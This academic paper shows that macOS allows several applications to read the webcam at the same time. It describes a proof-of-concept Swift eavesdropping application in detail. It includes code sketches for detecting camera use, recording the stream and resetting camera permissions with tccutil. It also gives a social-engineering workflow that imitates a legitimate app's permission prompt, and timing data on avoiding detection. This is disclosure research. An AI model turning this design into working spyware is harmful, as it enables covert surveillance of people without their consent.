
One Light, One App: Tackling A Common
Misperception Causing Breach of User Privacy

Efi Siapiti, Ioanna Dionysiou [0000-0002-7274-5269], and Harald
Gjermundrød [0000-0003-1421-5945]

Department of Computer Science
School of Sciences and Engineering
University of Nicosia, Nicosia, Cyprus
{siapiti, dionysiou.i, gjermundrod.h}@unic.ac.cy

Abstract. Built-in and computer-connected web cameras can be hacked with
malware that aims to activate the camera without turning on the green LED
indicator (in systems that support this feature). A simple countermeasure to at
least preserve the user's privacy, until the security incident is contained, is to
cover the camera when not in use. One could also argue that there is a sense of
security when an application (e.g., Zoom, WebEx, Skype) is using the web camera
and the light is on. The user trusts that there is a one-to-one relationship between
the web camera (and its light indicator) and an application. In this paper, we
tackle this common misperception by demonstrating that the aforementioned
relationship could be one-to-many, allowing many applications to access the web
camera stream simultaneously, posing a serious privacy threat that could go undetected.

Keywords: Privacy · Simultaneous Access · Web camera · macOS

1 Introduction
One could argue that a user is not entirely oblivious to the fact that cybercriminals could
spy on users through their web cameras. Numerous articles, news reports, and even posts
on social media communicate to the general public that there is a risk of unauthorized
access to the web camera, either built-in or externally connected, that could be gained
without turning the camera light on (in systems that support this feature). This is
undoubtedly troublesome, as the camera light is viewed as a privacy safeguard, notifying
the user that data is being collected. In order to preserve one's privacy from this threat,
a variety of countermeasures are deployed, ranging from simple solutions such as
dark-colored tape and sticky notes to more sophisticated accessories such as sliding
camera covers. Needless to say, these approaches do not address the cause of the privacy
compromise (i.e., detect and/or recover from the malware deployment); they merely
provide, at some level, guarantees for the user's privacy.
Suppose we were to formulate the user's perception of the web camera with regard
to his/her privacy (see Table 1). We claim that this perception is linked to the technical
background of the user. A user with no technical background is likely to only think
in terms of on and off, presuming that the web camera is on as long as the
application that is using it is active and off otherwise. The camera is viewed as an
integral part of the application and subsequently its overall functionality. A user with
no technical knowledge but informed about security threats could consider the possibility
of unwanted surveillance via malware installed on his/her machine, something that
compromises his/her privacy. On the other hand, technically-oriented users are aware of
the surveillance threat and its impact on privacy.

Table 1. User Perception of his/her Privacy related to a Computer Web Camera

User Profile                                    Perception
No technical background                         no privacy concerns
No technical background, but security-informed  privacy compromise possible via unauthorized access
Technical background                            aware of the surveillance threat and its privacy impact

This paper addresses the common misperception of mutex-like camera access by
demonstrating that the aforementioned relationship could be one-to-many. Consider the
macOS operating system and its camera access policy. Its current configuration allows
simultaneous access to the camera resource by multiple processes originating from
different programs. For example, while a web browser is accessing the camera stream, a
video chat service may request and be granted access to the same stream. Table 2 displays
the findings of a simple experiment conducted to investigate the simultaneous access
policy for the camera resource in various operating system environments. Six applications
that required the use of the camera were started in sequential order. It was observed that
on the macOS and Windows operating systems, all six applications were granted access
to the camera stream simultaneously. iOS and Android locked the camera resource while
it was in use by an application, denying access requests to the camera resource until it
was released by that application.

Table 2. Operating Systems Simultaneous Camera Access Policy

Operating System                         Simultaneous Camera Access  Documented
macOS, versions 11.0 - 12.1 (Intel CPU)  yes                         yes
macOS, version 12.1 (M1 CPU)             yes                         yes
Windows 10, version 20H2                 yes                         not explicitly mentioned
iOS                                      no                          yes
Android                                  no                          yes

The camera LED light acting as a privacy measure is only meaningful in the case of
exclusive camera access by applications, a policy enforced in the iOS operating system.
Simultaneous access to the camera stream poses a privacy threat leading to either an
accidental or a deliberate breach of privacy. In the former case, one could be caught in a
hot camera1 situation (similar to a hot mic), whereas in the latter the camera stream could
be accessed without authorization and stored for later replay by a malicious agent. The
privacy threat that stems from allowing simultaneous access to the camera stream is
further amplified by the absence of visible notifications informing the user that a new
process has been granted access to the camera feed. The default access control notification
pops up only the first time an application attempts to access the camera, essentially asking
the user to grant access to the camera resource. Once the access control privilege is set,
any new process spawned to run the application is assigned the access right without
informing the user. Figure 1 shows the expanded Control Center on macOS obtained
during the experiment, listing the applications currently using the microphone but
omitting details for the camera resource.

Fig. 1. Control Center in macOS Big Sur

The objective of this paper is to demonstrate the breach of privacy caused by
simultaneous camera resource access. The paper's contributions are twofold:
– Implementation of a proof-of-concept application that eavesdrops on and stores the
camera stream currently accessed by a legitimate application, causing a privacy
incident. To be more specific, an application is implemented in Swift v.5 that detects
when the camera is currently used by a legitimate application, requests and is
granted camera access as well, and stores the camera stream in a file that could be
replayed at a later stage. The application detects when the legitimate application
halts its camera access and does the same so as not to be detected.
– Demonstration that current notification policies are not adequate to protect the
average user's privacy. It will be shown that the eavesdropping application does not
appear in the Control Center because it does not use the microphone.
The rest of the paper is organized as follows: Section 2 gives a brief overview
of privacy issues related to the use of cameras. Section 3 discusses the design and
implementation details of the eavesdropping application. Experiments are presented in
Section 4. Section 5 concludes the paper.
1 The camera is on but the user is unaware of it. As an example, consider having a multi-user
Zoom meeting where one participant needs to leave the meeting. Instead of leaving the meeting,
the user minimizes the window and starts his/her next Webex meeting. Both applications have
access to the camera feed.

2 Camera-Related Privacy Issues and Challenges


Traditionally, privacy concerns related to the data collected by cameras focused
on surveillance cameras. Private organizations use surveillance cameras for physical
security, organizational, and/or operational reasons. Several live-feed cameras located
inside and outside the premises capture and store everything within their view.
Needless to say, the collected data includes sensitive information such as license plates
of cars, identification cards of customers, patient files in hospitals, and personal financial
information in banks, to name just a few examples [10]. Clearly, there is an elevated risk
of violating the privacy of individuals who did not give their consent to the collection of
data involving them.
Similarly, using a mobile device to take a picture in a public place could also pose a
threat to one's privacy. Not only is it common for a personal photo or video taken in
public to also contain bystanders who did not consent to being included in that
picture/video, but quite often these photos/videos are posted on social media and made
public [4]. With simple facial recognition software, which is easy to obtain, one could
track an individual's whereabouts by scanning publicly available photos.
The above privacy concerns relate to the breach of user privacy based on
the actual photo/video content and could be alleviated with machine-learning-based
countermeasures, such as automatic obfuscation of sensitive information and bystanders
[10, 4, 6]. In the case of sensitive information, a running list of items considered to be
sensitive is maintained. Using object recognition technology, those items are identified
in the live feed and obfuscated [10]. In the case of bystanders, identifying who is the
target of the picture and who is a bystander is done either by training a model on existing
images or by mathematical evaluation of parameters such as where an individual's head
is turned and how close an individual is to the camera. The people who are deemed to be
bystanders by the software have their faces obfuscated to preserve their privacy [4, 6].
A complicating factor in the deployment of the above solutions is the need for access to
a large amount of training data, including a plethora of images of personal information
and faces.
User privacy could also be violated if one could correlate a photo/video to a specific
camera using the photo response non-uniformity (PRNU) fingerprint. This privacy threat
relates to how the contents were rendered rather than the contents themselves. PRNU
fingerprints are caused by imperfections in the image sensors, something that is
unavoidable due to the camera manufacturing process. To be more specific, imperfections
arise from the different light sensitivity of each individual pixel, making the photos
taken by a specific camera traceable to it. This method of identification is also applicable
to videos generated by web cameras [7]. In this case, the fingerprint is extracted by
taking several pictures with a specific camera, collecting noise parameters, and using a
mathematical formula to derive the camera-specific fingerprint. As a matter of fact, this
technique is used by law enforcement to identify perpetrators of serious crimes such as
child pornography and terrorist propaganda.
The privacy threats are similar to those of biometric identification. There is the risk of
unauthorized disclosure of the PRNU fingerprint. If any PRNU fingerprint is leaked, even
an anonymous one, it could be matched to the PRNU fingerprints of publicly available
photos on social media. It is trivial to determine the fingerprint, as only a couple of photos
are required to get a good estimate of the camera fingerprint. As mentioned above, this
is a technique used in serious crimes, where a fingerprint could be matched to several
potential suspects (biometric identification is not a binary operation). Unauthorized
disclosure of the suspect list would undoubtedly have serious, life-altering implications
for the innocent ones [8]. Furthermore, a malicious individual could determine one's
camera fingerprint from images posted on his/her social media accounts and superimpose
it onto images with incriminating material, essentially framing an innocent person for
these criminal activities [5].
Several approaches have been suggested to address the privacy concerns that the PRNU
fingerprint poses. One rather straightforward approach is encrypting both the fingerprint
and the noise. The computation of the fingerprint is done in unencrypted form but
in a trusted environment, then saved in an e-PRNU (encrypted) form that can only
be accessed by authorized users holding the appropriate decryption key. Significant
overhead is added due to the encryption process and the key management [8], and as a
result hybrid solutions that keep part of the data unencrypted and add equalization
(a mathematical model) to prevent leakages have also been proposed [9].
Rather than focusing on the confidentiality of the PRNU fingerprint, other solutions
targeted its integrity. This is a countermeasure against forging the PRNU of a photo to
incriminate an innocent individual. One example is the triangle test, in which the victim
cross-checks and identifies the images that were forged using the original images, thus
proving his/her innocence [5].

3 Eavesdropping Application Design and Implementation Specifics

The privacy issues described in Section 2 are linked to the disclosure of one's identity
without his/her consent. There are also privacy compromises that do not target an
individual's identity but his/her actions. Consider virtual meetings. The confidentiality
of a virtual meeting is taken for granted, as end-to-end encryption is used among
the participating parties, providing guarantees that eavesdropping on the communication
stream is not feasible. This is only partially accurate; it is indeed impractical to hijack a
secure connection and its in-transit flow. Locally, however, eavesdropping is possible.
From the operating system's perspective, the web camera is a shared resource, with
all the implications that entails. Popular operating systems allow multiple access to
resources to support multi-tasking and multi-user environments. The trade-off, though,
in the case of the web camera, comes at the expense of privacy, as will be demonstrated.
An eavesdropping application, once granted access to the web camera, can proceed to
access the camera feed without any further explicit authorization. It is highly unlikely
that a user with no technical background would detect that his/her current virtual meeting
is being eavesdropped on by another application running locally.
In this section, the design and implementation details of an eavesdropping application,
which monitors in real time the camera stream used by a legitimate application
and replays it at a later time, are given. Detailed information about the application can be
found in [11].

3.1 Eavesdropping Application Overview

Figure 2 illustrates the dataflow diagram of the developed application. As shown, the
external entities are the user, who initiates the functions, the authorization center in
macOS, and the physical camera. The data storage is the folder that stores all the
captured streams. For brevity, the functions included are the ones considered to be the
primary building blocks of the application framework. CameraOn() is a function that
runs in a loop and detects whether the camera is on. findCamId() retrieves the camera
ID assigned to the camera by the operating system. If the status of the camera resource
is on, the setupStartCamera() function is called, which creates two objects:
AVCaptureSession and AVCaptureMovieFileOutput. The former is used to initiate a
session with the camera and access the camera stream. The latter is used to create a file
and copy the stream into that file. When the camera status is detected to be off, both
objects are deleted and setupStartCamera() terminates. Last, but not least,
resetAuthorization uses the CLI to reset all camera authorizations. This is done in order
to grant camera access rights to the eavesdropping application. More details on this are
given below.
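The polling cycle built from these functions can be sketched as follows. This is an illustrative skeleton, not the paper's actual code: the camera-status query (the paper's CameraOn(), a CoreMediaIO call in practice) is injected as a closure so the control flow can be shown without macOS-specific frameworks, and each capture session is reduced to recording a file name.

```swift
import Foundation

// Illustrative skeleton of the detection loop (not the paper's actual code).
// The camera-status query is injected so the control flow stays portable.
final class EavesdropLoop {
    private let isCameraOn: () -> Bool
    private(set) var capturedFiles: [String] = []
    private var session = 1
    private var fileInSession = 0
    private var wasOn = false

    init(isCameraOn: @escaping () -> Bool) {
        self.isCameraOn = isCameraOn
    }

    // One polling iteration: while the camera is on, each iteration stands in
    // for one capture window written to a new, sequentially numbered file.
    // When the camera turns off, the session counter advances so the next
    // legitimate stream starts a fresh "session x" series.
    func poll() {
        if isCameraOn() {
            fileInSession += 1
            capturedFiles.append("session \(session), file \(fileInSession).mov")
            wasOn = true
        } else if wasOn {
            session += 1
            fileInSession = 0
            wasOn = false
        }
    }
}
```

In the real application the body of poll() would create and tear down the AVCaptureSession/AVCaptureMovieFileOutput pair described below.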

Fig. 2. Dataflow Diagram of the Eavesdropping Application

3.2 API Library Details

The application development framework is based on two media libraries: CoreMediaIO
and AVFoundation.
CoreMediaIO2 is a low-level C-based framework that publishes the Device Abstraction
Layer (DAL) plug-in API. It allows access to media hardware through a kernel extension
(KEXT) and supports capturing video, or audio with video [1]. The application utilizes
CMIOObjectPropertyAddress to find the address of the physical camera, setting its
property selector parameter to kCMIOHardwarePropertyDevices to target the physical
devices. CMIOObjectGetPropertyDataSize and CMIOObjectGetPropertyData are queries
on CMIOObjects (e.g., the camera resource) to detect data passing through them. The
response to both queries is an OS status indicating success or failure.
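A hedged sketch of the resulting status check: on macOS the query pair above fills a property payload and returns an OSStatus; here the CoreMediaIO call is abstracted behind a closure so only the decision logic is shown. The selector named in the comment (kCMIODevicePropertyDeviceIsRunningSomewhere) is commonly used for this purpose but is an assumption, not stated in the paper.

```swift
// Sketch of the "is the camera in use?" decision built on the two queries
// above. On macOS, CMIOObjectGetPropertyDataSize / CMIOObjectGetPropertyData
// would fill `isRunning` (e.g. via the kCMIODevicePropertyDeviceIsRunning-
// Somewhere selector -- an assumption on our part) and return an OSStatus.
typealias OSStatusCode = Int32
let kNoError: OSStatusCode = 0

func cameraIsOn(query: () -> (status: OSStatusCode, isRunning: Bool)) -> Bool {
    let (status, isRunning) = query()
    // Treat a failed query as "camera off" instead of aborting the loop.
    guard status == kNoError else { return false }
    return isRunning
}
```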
AVFoundation is a high-level framework that manages audio and visual information,
controls device cameras, processes audio and video, and is used to configure sessions
with both audio and video files. The specific subsystem of AVFoundation that was used
is the capture subsystem, which allows developers to customize and build camera
interfaces for photos and videos. Additionally, it gives them control over the camera
capture to adjust the focus, exposure, and/or stabilization. Another important feature is
direct access to the data streaming from a capture device, something that is utilized by
the application to access the camera stream and store it to a file [2]. To be more specific,
AVCaptureSession is the object that establishes the connection with the camera and
manages capture activity and data flow from camera or audio input devices to outputs
such as a file or a window. This object has a central role in the eavesdropping application,
as it is the means to establish a connection to the camera and proceed with unauthorized
access to the camera stream. Another object used is AVCaptureDevice, which represents
a device that supports video or audio input. It is used in capture sessions and offers
controls for software-specific capture features. AVCaptureDeviceInput defines the
specific input from a capture device to a capture session, whereas AVCaptureMovieFileOutput
is a capture output that records video or audio to a QuickTime movie file.
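The capture pipeline just described can be outlined as below. The AVFoundation calls are real API names, but the snippet is a sketch of the general pattern rather than the paper's implementation (delegate handling and error recovery are omitted, and the whole pipeline is guarded so the file also compiles where AVFoundation is absent); the file-naming helper mirrors the session x, file y.mov scheme described in Section 4.

```swift
import Foundation
#if canImport(AVFoundation)
import AVFoundation
#endif

// "session x, file y.mov" naming, as used by the application for output files.
func outputURL(session: Int, file: Int) -> URL {
    URL(fileURLWithPath: NSTemporaryDirectory())
        .appendingPathComponent("session \(session), file \(file).mov")
}

#if canImport(AVFoundation)
// Outline of the AVCaptureSession -> AVCaptureDeviceInput ->
// AVCaptureMovieFileOutput pipeline (a sketch, not the paper's exact code).
func startCapture(to url: URL,
                  delegate: AVCaptureFileOutputRecordingDelegate) throws -> AVCaptureSession {
    let session = AVCaptureSession()
    guard let camera = AVCaptureDevice.default(for: .video) else {
        throw NSError(domain: "EavesdropSketch", code: 1)  // no camera found
    }
    let input = try AVCaptureDeviceInput(device: camera)   // camera input
    let output = AVCaptureMovieFileOutput()                // QuickTime file output
    session.addInput(input)
    session.addOutput(output)
    session.startRunning()                                 // opens the camera stream
    output.startRecording(to: url, recordingDelegate: delegate)
    return session
}
#endif
```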
An auxiliary library used by the application is RunLoop [3]. A RunLoop object
behaves as an event manager; it has inputs for sources such as the window system, port
objects, and mouse or keyboard events, and it also processes timer events. Each thread
has its own RunLoop object, and the class is not thread-safe. Had a RunLoop object not
been used, changes in the camera status would not have been detected after each loop
iteration. It is also used as a timer to implement delays after each loop.
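As a minimal illustration of this RunLoop-driven polling (Foundation only; the 50 ms interval is arbitrary, not a value from the paper), a repeating timer fires on the current thread's run loop, each fire standing in for one camera-status check:

```swift
import Foundation

var checks = 0
// A repeating timer scheduled on the current thread's RunLoop; each fire
// stands in for one periodic camera-status check.
let timer = Timer.scheduledTimer(withTimeInterval: 0.05, repeats: true) { _ in
    checks += 1
}
// Drive the run loop long enough for several fires, then stop the timer.
RunLoop.current.run(until: Date(timeIntervalSinceNow: 0.3))
timer.invalidate()
```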

3.3 Implementation Challenges


Two main challenges were encountered during the development of the application.
The first was detecting when the legitimate stream was turned off. The issue arises
because, once the camera is detected to be on (i.e., used by a legitimate application),
the eavesdropping application establishes a connection to the camera itself. Thus, even
after the legitimate application terminates, the camera status is still detected as on.

2 There is little documentation on this framework, possibly because it is a low-level
framework. There is, however, no indication that this library is deprecated.

The first attempt to fix the problem was to have the eavesdropping application pause
its connection to the camera stream after a predefined time interval, check whether the
camera was still on, and resume the connection to the stream if it was on or stop it if
the camera was off. This approach was not successful, as pausing the connection does
not release the resource; it just stops the recording to the output file. Thus, the camera
remains in an active status.
This observation led to the second approach, which resolved the issue. When the camera
is detected as on, a new session is created, a new file is created, and the stream is saved
in that file. After a predefined time interval, the capture session is terminated and the
camera status is queried. An on status will only be returned if the camera is still used by
the legitimate application. In the case of a positive status, a new session is established
and a new file is created. The files are numbered in incremental order. Once the camera
is detected as off, no further session is established. A delay of a few seconds can be
observed, i.e., the legitimate application has terminated but the capturing of the camera
stream continues until the eavesdropping application detects the off status of the camera.
The application keeps checking the camera status periodically in order to start capturing
the next legitimate camera stream. All the files created for a specific camera stream can
be assembled together to reconstruct the original stream, with short gaps at regular
intervals due to the time spent switching between terminating a session and initiating a
new one.
It is worth noting that the time delay variables can be adjusted depending on the
balance between the timing accuracy in starting/ending the stream capture and the
acceptable amount of stream loss. A longer delay means less stream loss but worse
accuracy in starting/ending the stream, whereas a shorter delay entails very good
accuracy, but more seconds lost from the stream.
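This trade-off can be put into a back-of-the-envelope model (illustrative, not the measured values of Section 4): the application records for interval seconds, releases the camera, and needs roughly restartDelay seconds before recording resumes.

```swift
// Simple model of the fidelity/accuracy trade-off: record `interval` seconds,
// then lose `restartDelay` seconds re-acquiring the camera, until the
// legitimate stream of length `total` ends. Returns the seconds captured.
func capturedSeconds(total: Double, interval: Double, restartDelay: Double) -> Double {
    var elapsed = 0.0
    var captured = 0.0
    while elapsed < total {
        let recorded = min(interval, total - elapsed)
        captured += recorded
        elapsed += recorded + restartDelay
    }
    return captured
}
```

With a 120-second stream and a 3-second restart delay, for example, this model captures 48 s at a 2-second interval but 111 s at a 30-second interval, reproducing the pattern (though not the exact figures) of Table 4.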
The second challenge encountered was that the eavesdropping application does not
operate correctly on a MacBook with an M1 processor running macOS Big Sur
(version 11); the queries that detect whether the camera is on or off always return true.
This is believed to be due to a bug in the framework used, as the application works as
expected under macOS Monterey (version 12) on the same MacBook with the M1
processor.

4 Experimental Analysis and Findings

The experimental objectives were twofold: (a) demonstrate the workflow of an attack
that compromises the victim's privacy using the developed eavesdropping application
and (b) assess the performance of the eavesdropping application in terms of CPU,
memory, and disk usage and compare it against the legitimate application's performance
to deduce any discrepancies that could lead the victim to suspect the unauthorized access
to the camera. The experiment configuration settings are as follows: 2015 MacBook Air
(1.6 GHz dual-core Intel Core i5, with 8 GB of RAM) running macOS Big Sur (version
11.5.1).

4.1 Attack Workflow


Without any loss of generality, it is assumed that the malicious payload is already
downloaded on the victim's system and the attacker has established remote access to it.
The attack timeline is shown in Figure 3 and details of the attack phases are given below.

Fig. 3. Attack Timeline and Phases

Pre-Attack Phase 0: Preparing the Notification Window The goal of Pre-Attack
Phase 0 and Attack Phase 1 is to assign camera access rights to the eavesdropping
application. This is accomplished by manipulating the victim into clicking the pop-up
notification window asking permission for the eavesdropping application to access the
camera. Thus, prior to the attack, the eavesdropping application file is renamed to
resemble the legitimate application, and the description of the access control notification
is changed to be exactly the same as the one observed for the legitimate application (see
Figure 4). The notification text is partly modifiable and can be changed to impersonate
another application that is not malicious. One could even change the application name
and icon to completely impersonate a legitimate app.

Fig. 4. Modifiable Notification Description

Attack Phase 1: Resetting Camera Access Authorizations Once the eavesdropping
application is initiated, the first step is to reset all authorizations to the camera resource.
This is a social engineering attack step; resetting the authorization to the camera for
all applications requires every application to explicitly request camera access from the
user again. The OS does indeed provide the necessary means to reset the permissions
for all applications via a single call.
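On macOS this reset is exposed through the tccutil command-line tool (tccutil reset Camera clears the camera permission for every application). A hedged sketch of the paper's resetAuthorization step, building the command portably and only launching it where it exists:

```swift
import Foundation

// The tccutil invocation that clears camera permissions for all applications.
func resetCameraAuthorizationCommand() -> [String] {
    ["/usr/bin/tccutil", "reset", "Camera"]
}

#if os(macOS)
// Launch the command (macOS only; tccutil does not exist elsewhere).
func resetCameraAuthorizations() throws {
    let cmd = resetCameraAuthorizationCommand()
    let process = Process()
    process.executableURL = URL(fileURLWithPath: cmd[0])
    process.arguments = Array(cmd.dropFirst())
    try process.run()
    process.waitUntilExit()
}
#endif
```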

Attack Phase 2: Establishing Connection to the Legitimate Camera Stream The
camera detection sequence is initiated next, which checks whether or not the camera is
on (i.e., used by the legitimate application). Once the victim starts a legitimate
application that needs access to the camera resource, the authorization notification pops
up (Figure 5) because of the social engineering attack performed in Phase 1.

Fig. 5. Legitimate Application Authorization Notification

Granting the access results in activating the camera, something that is detected by the eavesdropping
application. An opportunity window is created to assign camera access rights to the
eavesdropping application by displaying an almost identical authorization notification
(Figure 6). The second notification is displayed just one second after the first one. Due to
the similarities, it is anticipated that the average user will click on the second notification,
thus granting authorization to the camera resource.

Fig. 6. Eavesdropping Application Authorization Notification

Attack Phases 3 and 4: Capturing the Camera Stream and Terminating the Connection
After the successful outcome of Attack Phase 2, the eavesdropping application captures
the camera stream and copies it to multiple output files. These output files are sequentially
numbered in the format session x, file y.mov, where x, y = 1, 2, 3, and so on. The session
number is increased by one every time the camera is detected as off. This is done to
facilitate the concatenation of the files that reconstruct the original stream at a later
stage.
When the legitimate application stops accessing the camera, the eavesdropping
application also releases the stream almost immediately (within a few seconds) and thus
the victim is not alarmed. It is worth noting that the application does not appear in the
Control Center because it does not use the microphone (see Figure 7).
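Reassembling the stream requires concatenating the files in numeric order; a plain lexicographic sort would put file 10 before file 2. A small helper (assuming exactly the session x, file y.mov naming above) that sorts by the (session, file) pair:

```swift
import Foundation

// Order "session x, file y.mov" names by their numeric (session, file) pair,
// the order in which they must be concatenated to reconstruct the stream.
func reconstructionOrder(_ names: [String]) -> [String] {
    func key(_ name: String) -> (Int, Int) {
        let nums = name.split(whereSeparator: { !$0.isNumber }).compactMap { Int($0) }
        // Fall back to sorting last if a name does not match the scheme.
        return nums.count >= 2 ? (nums[0], nums[1]) : (Int.max, Int.max)
    }
    return names.sorted { key($0) < key($1) }
}
```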

Fig. 7. Eavesdropping Application Not Appearing on the Control Center

4.2 Experimental Findings


Performance Metrics It was observed that the overall resource usage of the
eavesdropping application was lower than that of the legitimate application (Figure 8
and Figure 9, respectively). Thus, it can be asserted that the victim will not be alerted to
the privacy compromise incident, as the resource consumption is not significant.
More specifically, the values for the eavesdropping application fluctuated due to the
switching between connecting to and terminating the camera stream. The CPU usage
was in the range 0% to 13%, the memory increased from 17 MB to 23.4 MB, and the
disk usage was in the range 0 to 396 KB/s. On the other hand, the values for the
legitimate application were stable. The CPU usage was around 35%-50%, the memory
at 110.7 MB, and the disk at 340 KB/s. The average approximate values are summarized
in Table 3.

Fidelity of the Captured Stream As mentioned earlier, in order for the eavesdropping
application to go unnoticed by the end user, it must release access to the camera at
regular intervals. This is done to check whether the legitimate application has ended its
usage of the camera. A short interval entails that the fidelity of the captured stream will
be low; however, the camera will stay on for only a very short time (high accuracy) after
the legitimate application releases its access to the camera. On the other hand, a long
interval will increase the fidelity of the captured stream at the cost of having the camera
stay on for a longer time (low accuracy) after the legitimate application has ended.

Fig. 8. Eavesdropping Application Resource Usage

Fig. 9. Legitimate Application Resource Usage
Thus, there is a trade-off to be considered between the required fidelity of the captured
stream and the time interval that the camera remains on once the legitimate application
releases its access to the camera. If the time interval is long, the risk increases that the
user may suspect the privacy breach. However, the usefulness of the captured stream
depends on its fidelity (i.e., fewer gaps in the recording result in a higher-quality video).
Configuring the accuracy depends on the usage scenario.
An experiment was conducted in order to benchmark the fidelity of the captured
stream at varying accuracy levels. The findings could be used as guidelines for setting
the minimum accuracy value that yields the desired fidelity of the captured stream.
The experiment was based on having a legitimate application use the camera for
120 seconds. Five different runs were conducted, where in each run the eavesdropping
application used accuracy values of 2 seconds, 5 seconds, 10 seconds, 20 seconds, and
30 seconds respectively. The results are summarized in Table 4. As can be seen, very
high accuracy captures approximately 12% of the video stream, while at a very relaxed
accuracy of 30 seconds approximately 93% of the stream is captured. Furthermore,
there is a substantial delay in restarting the recording, as well as a high variance in the
restart delay recorded in these specific experiments. This delay can be attributed to
releasing a resource (i.e., the camera), then determining whether the camera is still in
use, followed by a request to access the camera resource again. As each deployment
scenario will have different requirements (both with respect to accuracy and fidelity), a
general recommendation is difficult to make. However, as this is a proof-of-concept
application, better approaches are possible and will be investigated as future work.

Table 3. Resource Usage By Legitimate and Eavesdropping Applications

                   CPU Usage  Memory Usage  Disk Usage
Eavesdropping app  6.5%       20.5 MB       185 KB/s
Legitimate app     42%        110 MB        340 KB/s

Table 4. Accuracy and Stream Loss Correlation

                                   2 seconds  5 seconds  10 seconds  20 seconds  30 seconds
Seconds Reconstructed              13         43         84          109         112
Seconds Lost                       107        77         36          11          8
Video files created                30         12         9           5           4
Avg. delay to restart capture (s)  3.7        2.8        4.5         7           2.7

5 Concluding Remarks and Future Directions

User privacy in distributed collaborative networked environments has been given more
attention in the last few years. The privacy policy of the European Commission related
to personal data protection (widely known as the GDPR), the support of private browsing
modes, as well as privacy policies in popular social networking media, are initiatives
that aim at cultivating a privacy culture not just in the workplace but in all aspects of
one's life. The unprecedented rise in video conferencing due to the exponential growth
of remote working and teaching forced users to reconsider their privacy during virtual
meetings. Background blurring features, using proximity and movement as classifiers
of what should be blurred, and disabling the video stream when it is not required are
measures taken by participants to protect their privacy.
One could claim that a user without technical background, when it comes to the web
camera, mainly associates his/her privacy with the data collected by the camera resource.
The user is most likely unaware of the fact that in certain systems multiple applications
can access the camera stream, giving him/her a false sense of privacy. A camera is
considered a resource of the operating system, similar to files, disks, and printers, to
name just a few. Simultaneous access is permitted, especially for read-only access,
allowing concurrent sharing of system resources among users or processes acting on
behalf of users.
In this paper, an application that eavesdrops on and stores the camera stream currently
accessed by a legitimate application was presented. The experimental findings
demonstrated that the eavesdropping application does not consume system resources at
a rate that would alert the user to the privacy incident.
A thorough investigation is currently underway for other desktop operating systems,
such as Microsoft Windows (different versions will be evaluated) and different
GNU/Linux distributions. This comprehensive view could allow us to determine whether
this is a platform-dependent feature or a multiplatform one. Regarding future directions,
there are several enhancements that could extend the functionality of the current
application. First, there are extensions that could be integrated, such as microphone
audio capturing. Second, a more effective way of detecting when the legitimate
application is releasing the camera could be devised, as this would greatly improve the
quality of the captured stream and minimize the probability that the victim becomes
suspicious, since the eavesdropping application would release the camera almost
immediately. Third, lab experiments could be conducted with users to assess their
awareness/realization of the privacy incident at varying accuracy levels.

References
1. Apple: Mac technology overview (2015), https://developer.apple.com/library/archive/
documentation/MacOSX/Conceptual/OSX_Technology_Overview/
SystemTechnology/SystemTechnology.html, [ONLINE], Last accessed: January 20, 2022
2. Apple: Documentation of avfoundation (2022), https://developer.apple.com/documentation/
avfoundation, [ONLINE], Last accessed: January 20, 2022
3. Apple: Documentation of runloop (2022), https://developer.apple.com/documentation/
foundation/runloop/, [ONLINE], Last accessed: January 20, 2022
4. Darling, D., Li, A., Li, Q.: Identification of subjects and bystanders in photos with feature-
based machine learning. In: IEEE INFOCOM 2019 - IEEE Conference on Computer Com-
munications Workshops (INFOCOM WKSHPS). pp. 1–6 (2019)
5. Goljan, M., Fridrich, J., Chen, M.: Defending against fingerprint-copy attack in sensor-based
camera identification. IEEE Transactions on Information Forensics and Security 6(1), 227–
236 (2011). https://doi.org/10.1109/TIFS.2010.2099220
6. Li, A.: Privacy-Preserving Photo Taking and Accessing for Mobile Phones. Ph.D. thesis,
University of Arkansas (August 2018). https://doi.org/10.13140/RG.2.2.28953.88166
7. Martin-Rodriguez, F.: PRNU-based source camera identification for webcam videos (2021)
8. Mohanty, M., Zhang, M., Asghar, M., Russello, G.: e-PRNU: Encrypted domain PRNU-based
camera attribution for preserving privacy. IEEE Transactions on Dependable and Secure
Computing 18(01), 426–437 (Jan 2021). https://doi.org/10.1109/TDSC.2019.2892448
9. Pérez-González, F., Fernández-Menduiña, S.: PRNU-leaks: facts and remedies. In:
2020 28th European Signal Processing Conference (EUSIPCO). pp. 720–724 (2021).
https://doi.org/10.23919/Eusipco47968.2020.9287451
10. Ramajayam, G., Sun, T., Tan, C.C., Luo, L., Ling, H.: Deep learning approach pro-
tecting privacy in camera-based critical applications. CoRR abs/2110.01676 (2021),
https://arxiv.org/abs/2110.01676
11. Siapiti, E.: Camera privacy analysis. Tech. rep., University of Nicosia (February 2022), BSc
Final Year Project
